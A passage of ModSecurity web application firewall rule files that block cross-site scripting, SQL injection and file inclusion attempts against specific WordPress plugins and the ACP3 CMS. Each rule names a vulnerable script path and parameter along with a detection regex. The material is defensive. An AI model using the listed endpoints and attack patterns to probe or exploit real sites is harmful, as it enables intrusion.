"(?i:citation\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress Zotpress citation Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012476) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin folder.php type Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/1-flash-gallery/folder.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012476,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin folder.php type Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule ARGS:type "(?i:type\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin folder.php type Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012477) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin SQL Injection Attempt -- massedit_album.php gall_id SELECT SecRule REQUEST_LINE "@contains /wp-content/plugins/1-flash-gallery/massedit_album.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012477,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin SQL Injection Attempt -- massedit_album.php gall_id SELECT',tag:'web-application-attack'" SecRule ARGS:gall_id "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin SQL Injection Attempt -- massedit_album.php gall_id SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012478) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin SQL Injection Attempt -- massedit_album.php gall_id UNION SELECT SecRule REQUEST_LINE "@contains /wp-content/plugins/1-flash-gallery/massedit_album.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012478,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin SQL Injection Attempt -- massedit_album.php gall_id UNION SELECT',tag:'web-application-attack'" SecRule ARGS:gall_id "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin SQL Injection Attempt -- massedit_album.php gall_id UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012479) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin SQL Injection Attempt -- massedit_album.php gall_id INSERT SecRule REQUEST_LINE "@contains /wp-content/plugins/1-flash-gallery/massedit_album.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012479,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin SQL Injection Attempt -- massedit_album.php gall_id INSERT',tag:'web-application-attack'" SecRule ARGS:gall_id "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin SQL Injection Attempt -- massedit_album.php gall_id INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012480) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin SQL Injection Attempt -- massedit_album.php gall_id DELETE SecRule REQUEST_LINE "@contains /wp-content/plugins/1-flash-gallery/massedit_album.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012480,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin SQL Injection Attempt -- massedit_album.php gall_id DELETE',tag:'web-application-attack'" SecRule ARGS:gall_id "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin SQL Injection Attempt -- massedit_album.php gall_id DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012481) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin SQL Injection Attempt -- massedit_album.php gall_id ASCII SecRule REQUEST_LINE "@contains /wp-content/plugins/1-flash-gallery/massedit_album.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012481,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin SQL Injection Attempt -- massedit_album.php gall_id ASCII',tag:'web-application-attack'" SecRule ARGS:gall_id "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin SQL Injection Attempt -- massedit_album.php gall_id ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012482) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin SQL Injection Attempt -- massedit_album.php gall_id UPDATE SecRule REQUEST_LINE "@contains /wp-content/plugins/1-flash-gallery/massedit_album.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012482,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin SQL Injection Attempt -- massedit_album.php gall_id UPDATE',tag:'web-application-attack'" SecRule ARGS:gall_id "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin SQL Injection Attempt -- massedit_album.php gall_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012571) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS jQuery Mega Menu Wordpress Plugin Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/jquery-mega-menu/skin.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012571,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS jQuery Mega Menu Wordpress Plugin Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:skin "(?i:\.\.\\x2f)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS jQuery Mega Menu Wordpress Plugin Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012581) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress Lazyest Gallery Plugin image Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/lazyest-gallery/lazyest-popup.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012581,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress Lazyest Gallery Plugin image Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule ARGS:image "(?i:image\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress Lazyest Gallery Plugin image Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012601) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress Lazyest Gallery Plugin image Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/lazyest-gallery/lazyest-popup.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012601,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress Lazyest Gallery Plugin image Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule ARGS:image "(?i:image\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress Lazyest Gallery Plugin image Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012705) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress WP Publication file Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/wp-publication-archive/includes/openfile.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012705,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress WP Publication file Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress WP Publication file Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012722) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SocialGrid Plugin default_services Cross-Site Scripting Vulnerability SecRule REQUEST_LINE "@contains /plugins/socialgrid/static/js/inline-admin.js.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012722,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SocialGrid Plugin default_services Cross-Site Scripting Vulnerability',tag:'web-application-attack'" SecRule ARGS:default_services "(?i:default_services\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SocialGrid Plugin default_services Cross-Site Scripting Vulnerability',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012946) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress inline-gallery do parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /plugins/inline-gallery/browser/browser.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012946,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress inline-gallery do parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,46781'" SecRule ARGS:do "(?i:do\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress inline-gallery do parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2013155) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress plugin Flash Album Gallery pid Parameter SELECT FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/flash-album-gallery/lib/hitcounter.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013155,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress plugin Flash Album Gallery pid Parameter SELECT FROM SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:pid "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress plugin Flash Album Gallery pid Parameter SELECT FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2013156) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress plugin Flash Album Gallery pid Parameter DELETE FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/flash-album-gallery/lib/hitcounter.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013156,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress plugin Flash Album Gallery pid Parameter DELETE FROM SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:pid "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress plugin Flash Album Gallery pid Parameter DELETE FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2013157) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress plugin Flash Album Gallery pid Parameter UNION SELECT SQL Injection Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/flash-album-gallery/lib/hitcounter.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013157,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress plugin Flash Album Gallery pid Parameter UNION SELECT SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:pid "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress plugin Flash Album Gallery pid Parameter UNION SELECT SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2013158) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress plugin Flash Album Gallery pid Parameter INSERT INTO SQL Injection Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/flash-album-gallery/lib/hitcounter.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013158,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress plugin Flash Album Gallery pid Parameter INSERT INTO SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:pid "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress plugin Flash Album Gallery pid Parameter INSERT INTO SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2013159) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress plugin Flash Album Gallery pid Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/flash-album-gallery/lib/hitcounter.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013159,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress plugin Flash Album Gallery pid Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:pid "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress plugin Flash Album Gallery pid Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2013308) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress PHP Speedy Plugin page Parameter Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/php_speedy_wp/libs/php_speedy/view/admin_container.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013308,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress PHP Speedy Plugin page Parameter Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:page "(?i:page=\s*(ftps?|https?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress PHP Speedy Plugin page Parameter Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2013309) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress PHP Speedy Plugin page Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/php_speedy_wp/libs/php_speedy/view/admin_container.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013309,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress PHP Speedy Plugin page Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:page "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress PHP Speedy Plugin page Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2013310) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress PHP Speedy Plugin title parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/php_speedy_wp/libs/php_speedy/view/admin_container.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013310,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress PHP Speedy Plugin title parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule ARGS:title "(?i:title\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress PHP Speedy Plugin title parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2013425) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress eShop plugin eshoptemplate parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains page=eshop-templates.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013425,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress eShop plugin eshoptemplate parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule ARGS:eshoptemplate "(?i:eshoptemplate\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress eShop plugin eshoptemplate parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2013426) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress eShop plugin action parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains page=eshop-orders.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013426,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress eShop plugin action parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule ARGS:action "(?i:action\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress eShop plugin action parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2013427) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress eShop plugin viewemail parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains page=eshop-orders.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013427,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress eShop plugin viewemail parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule ARGS:viewemail "(?i:viewemail\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress eShop plugin viewemail parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2013464) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress UnGallery pic Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/ungallery/source_vuln.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013464,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress UnGallery pic Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:pic "(?i:\\x2e\\x2e\\x2f)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress UnGallery pic Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" SecMarker END_SLR_ET_WORDPRESS_RULES �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/slr_rules/modsecurity_crs_46_slr_et_xss_attacks.conf�������0000664�0000000�0000000�00000563126�12164572564�0033130�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # This ruleset was created by Trustwave SpiderLabs Research Team and includes data from: # # http://www.emergingthreats.net/ # SecRule REQUEST_FILENAME "!@pmFromFile modsecurity_46_slr_et_xss.data" "id:'2000006',phase:2,nolog,pass,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,skipAfter:END_SLR_ET_XSS_RULES" # (2003905) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- index.php form mods SecRule REQUEST_LINE "@contains /search/list/action_search/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003905,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- index.php form mods',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23834'" SecRule REQUEST_LINE "@contains form[mods][" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:<?(java|vb)?script>?.*<.+\/script>?)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- index.php form mods',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003906) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- index.php form SecRule REQUEST_LINE "@contains /search/list/action_search/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003906,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- index.php form',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23834'" SecRule REQUEST_LINE "@contains form[" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:<?(java|vb)?script>?.*<.+\/script>?)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- index.php form',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003907) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- download.php id SecRule REQUEST_LINE "@contains /modules/dl/download.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003907,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- download.php id',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23834'" SecRule &TX:'/XSS.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- download.php id',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003908) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- index.php form cat SecRule REQUEST_LINE "@contains /news/list/index.php" 